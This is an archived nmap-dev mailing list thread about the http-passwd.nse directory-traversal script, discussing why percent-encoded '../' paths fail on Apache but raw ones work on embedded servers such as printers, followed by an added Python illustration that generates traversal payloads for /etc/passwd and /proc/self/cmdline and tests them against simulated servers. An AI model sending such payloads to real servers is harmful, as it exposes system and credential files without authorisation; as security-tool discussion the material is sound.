Re: hexify() problem in http-passwd.nse
From: Joao Correa <joao () livewire com br>
Date: Sun, 31 May 2009 17:49:17 -0300
Thanks a lot Brandon!
Your 30-second answer was loud and clear!
On Sun, May 31, 2009 at 5:11 PM, Brandon Enright <bmenrigh () ucsd edu> wrote:
On Sun, 31 May 2009 16:47:31 -0300 or thereabouts Joao Correa
<joao () livewire com br> wrote:
Kris, thanks for your answer and for the reference.
My doubt is if, with the http-passwd.nse script, you are trying to
retrieve the passwd file directly, or if it is used to retrieve the
file as a parameter for the web application, just like described in
Considering the source code I can only think about the first option,
but in this case we fall on the problem described in my first e-mail
(I've tried to reproduce the scenario here, but the hexed chars were
not decoded by the Apache, leading to failure). As mentioned before,
when I have removed the hexify function and sent the dir function
without special encoding, it worked fine. I don't think it is the
Since the script dates from 2007 and the mentioned RFC dates from
2005, I don't believe that it is a problem of lost compatibility due
to Apache getting fit to the RFC.
Have you used the script recently? Which web servers have you tried
Thanks a lot,
Hey João, sorry that I only have about 30 seconds to reply. The
directory traversal script really isn't targeted at mainstream
webservers like Apache and IIS. In some really heinous cases I suspect
it would work against either, but it works pretty well against all of
the hundreds of obscure webservers out there.
For example, the ../../../etc/password works against the embedded HTTP
server on many HTTP printers. Nevermind that it might violate RFC and
best practices, it works on lots of servers.
We might think of expanding the script beyond just /etc/password
though. I've seen a number of attacks recently that check for directory
traversal by going after /proc/self/cmdline which seems to be more
reliable than things like /etc/password
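The following is an added illustration of the two points raised in this thread, written in Python rather than NSE Lua; it is not code from http-passwd.nse or from either poster. It models (a) a naive embedded server that concatenates the request path onto its document root without percent-decoding, so the raw `../` payload reaches /etc/passwd while the hexified one does not, and (b) a stricter server that decodes first and rejects anything climbing above the root. The `hexify` helper is assumed to percent-encode every byte; both servers and their file contents are constructed stand-ins, not real Apache or printer firmware. The `/proc/self/cmdline` check looks for NUL-separated argv rather than a passwd-style line.

```python
import re
from urllib.parse import unquote

# Heuristic for /etc/passwd content: at least one "name:x:uid:gid:gecos:home:shell" line.
PASSWD_RE = re.compile(r"^[A-Za-z_][\w-]*:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^\n]*$", re.M)


def hexify(path):
    """Percent-encode every byte of PATH (assumed form of the NSE hexify helper)."""
    return "".join("%%%02X" % b for b in path.encode("utf-8"))


def traversal_payloads(target, depth=8, encoded=False):
    """Candidate request paths: '/' + '../' * n + target, for n = 1..depth."""
    payloads = []
    for n in range(1, depth + 1):
        raw = "../" * n + target.lstrip("/")
        payloads.append("/" + (hexify(raw) if encoded else raw))
    return payloads


def looks_like_passwd(body):
    return bool(PASSWD_RE.search(body))


def looks_like_cmdline(body):
    # /proc/self/cmdline is argv joined by NUL bytes; an HTML error page is not.
    return "\x00" in body and not body.lstrip().startswith("<")


def probe(fetch, target, checker, depth=8, encoded=False):
    """Request each payload via FETCH(path) -> body or None; return the first hit."""
    for path in traversal_payloads(target, depth, encoded):
        body = fetch(path)
        if body is not None and checker(body):
            return path
    return None


# --- constructed stand-ins for servers (no network involved) ---
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/sh\nadmin:x:1000:1000::/home/admin:/bin/sh\n",
    "/proc/self/cmdline": "/usr/sbin/mini_httpd\x00-C\x00/etc/mini_httpd.conf\x00",
    "/var/www/html/index.html": "<html>It works</html>",
}
DOCROOT = ["var", "www", "html"]  # three levels deep, so '../' * 3 reaches '/'


def naive_embedded_server(path):
    """Joins docroot + path and resolves '..' but never percent-decodes, so a
    hexified payload is looked up literally and fails (as Joao observed)."""
    if "%" in path:
        return None  # '%2E%2E' is not a real directory name
    stack = list(DOCROOT)
    for p in path.split("/"):
        if p == "..":
            if stack:
                stack.pop()
        elif p and p != ".":
            stack.append(p)
    return FAKE_FS.get("/" + "/".join(stack))


def strict_server(path):
    """Percent-decodes first, then refuses any path that would climb above the
    document root (roughly what a mainstream server does with a 400)."""
    stack = []
    for p in unquote(path).split("/"):
        if p == "..":
            if not stack:
                return None  # escape attempt: reject
            stack.pop()
        elif p and p != ".":
            stack.append(p)
    return FAKE_FS.get("/" + "/".join(DOCROOT + stack))


if __name__ == "__main__":
    print(probe(naive_embedded_server, "/etc/passwd", looks_like_passwd))
    print(probe(naive_embedded_server, "/etc/passwd", looks_like_passwd, encoded=True))
    print(probe(naive_embedded_server, "/proc/self/cmdline", looks_like_cmdline))
    print(probe(strict_server, "/etc/passwd", looks_like_passwd))
```

Against the naive server the raw payload succeeds at three levels of `../` and the hexified one never does, while the strict server rejects both; swapping in the `/proc/self/cmdline` target only changes the content check.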
Sent through the nmap-dev mailing list
Archived at http://SecLists.Org